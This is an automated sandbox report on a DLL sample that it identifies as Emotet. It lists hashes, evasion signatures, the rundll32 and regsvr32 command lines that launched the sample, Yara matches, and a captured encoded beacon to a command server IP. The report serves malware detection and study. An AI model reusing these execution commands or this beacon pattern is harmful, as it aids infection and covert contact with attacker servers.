Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x4ByCNJqst.dll

Overview

General Information

Sample Name:x4ByCNJqst.dll
Analysis ID:626484
MD5:8978c658ba95819f72866e0ffc41fa81
SHA1:f8eed4cba5ff946b074a9b2f95e2fb92c0427651
SHA256:50363092e6becfe6ad91c4118fcb2e9207ebb6d2016de3459d56b41fbc3b61c1
Tags:exetrojan
Infos:

Detection

Emotet
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Query firmware table information (likely to detect VMs)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Program does not show much activity (idle)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 2212 cmdline: loaddll64.exe "C:\Users\user\Desktop\x4ByCNJqst.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 4280 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 5972 cmdline: rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 5116 cmdline: regsvr32.exe /s C:\Users\user\Desktop\x4ByCNJqst.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 6440 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZqFjKrAb\CiXiSWjn.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 732 cmdline: rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 2312 cmdline: rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllUnregisterServer MD5: 73C519F050C20580F8A62C849D49215A)
  • svchost.exe (PID: 6544 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4336 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6404 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6944 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6784 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5148 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.356219703.0000017092640000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.regsvr32.exe.680000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              3.2.rundll32.exe.17092640000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                6.2.regsvr32.exe.f20000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  2.2.regsvr32.exe.680000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    4.2.rundll32.exe.1a5a5ea0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 3 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: x4ByCNJqst.dllVirustotal: Detection: 38%Perma Link
                      Antivirus detection for URL or domain
                      Source: https://23.239.0.12/_Avira URL Cloud: Label: malware
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.7:49789 version: TLS 1.2
                      Source: x4ByCNJqst.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.743348166.0000000000C74000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.743348166.0000000000C74000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000D26C

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: QDGlPmKOb=TX/dVeT7lyH5ngHmnxMFxqFeFIckgyS+eTvFxPj70GF45WQbYgIR5YD52OsRDc9blkyjiUa0Yqe6pSbgy2DVASEEWQlhPFUSnkyvs1j9fcs/03LtUxyEgokNnTm9BdbgUKLysz+GIHunJ3ICf+MbOMPcxyDQMEPxDtn7pCNcxuY2bJ346K6C6yeS1bR8Vwv7L6AvzN/6XVrUEvcLceWiPnN+L5HntiDuAJ2t3QmxGdGoD743iGvw+oldDKvtdideoP8CRqfM0HELQHL9xZ/PA34HGO1+ThmvKp607np2POFA3Gk1Jr7OalPDwf6Z5NEvJ+AZRsVDKA==Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 23.239.0.12 23.239.0.12
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.239.0.12
                      Source: svchost.exe, 00000010.00000003.579913846.000001F4B016D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000010.00000003.579913846.000001F4B016D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000010.00000003.579913846.000001F4B016D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.579932178.000001F4B017E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000010.00000003.579913846.000001F4B016D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.579932178.000001F4B017E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: regsvr32.exe, 00000006.00000003.428719669.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.743762097.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.597809900.000001F4B0100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.743897114.0000023FCBADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000010.00000002.597712126.000001F4AF8E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.743897114.0000023FCBADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: regsvr32.exe, 00000006.00000003.428821113.0000000000D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/
                      Source: regsvr32.exe, 00000006.00000003.428908993.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.428869428.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.743719059.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.428821113.0000000000D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23.239.0.12/_
                      Source: svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000010.00000003.584551631.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584742502.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584455774.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584636899.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584466682.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584705944.000001F4B0602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584669781.000001F4B061A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000010.00000003.584551631.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584742502.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584455774.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584636899.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584466682.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584705944.000001F4B0602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584669781.000001F4B061A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 00000010.00000003.584551631.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584742502.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584455774.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584636899.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584466682.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584705944.000001F4B0602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584669781.000001F4B061A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800132F0 InternetReadFile,RtlAllocateHeap,6_2_00000001800132F0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: QDGlPmKOb=TX/dVeT7lyH5ngHmnxMFxqFeFIckgyS+eTvFxPj70GF45WQbYgIR5YD52OsRDc9blkyjiUa0Yqe6pSbgy2DVASEEWQlhPFUSnkyvs1j9fcs/03LtUxyEgokNnTm9BdbgUKLysz+GIHunJ3ICf+MbOMPcxyDQMEPxDtn7pCNcxuY2bJ346K6C6yeS1bR8Vwv7L6AvzN/6XVrUEvcLceWiPnN+L5HntiDuAJ2t3QmxGdGoD743iGvw+oldDKvtdideoP8CRqfM0HELQHL9xZ/PA34HGO1+ThmvKp607np2POFA3Gk1Jr7OalPDwf6Z5NEvJ+AZRsVDKA==Host: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.7:49789 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 2.2.regsvr32.exe.680000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.17092640000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.f20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.680000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.1a5a5ea0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.17092640000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.1a5a5ea0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.f20000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.356219703.0000017092640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.358233793.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.356042845.000001A5A5EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.743858456.0000000000F20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\regsvr32.exeFile deleted: C:\Windows\System32\ZqFjKrAb\CiXiSWjn.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\ZqFjKrAb\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9BA77C2_2_00007FF8CA9BA77C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9B6F0C2_2_00007FF8CA9B6F0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9BEB602_2_00007FF8CA9BEB60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9BAF702_2_00007FF8CA9BAF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9BFB6C2_2_00007FF8CA9BFB6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9BFCA02_2_00007FF8CA9BFCA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9BB5CC2_2_00007FF8CA9BB5CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9B895C2_2_00007FF8CA9B895C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9B59442_2_00007FF8CA9B5944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9BE6C02_2_00007FF8CA9BE6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9BAA0C2_2_00007FF8CA9BAA0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_006400002_2_00640000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180010FF42_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180028C202_2_0000000180028C20
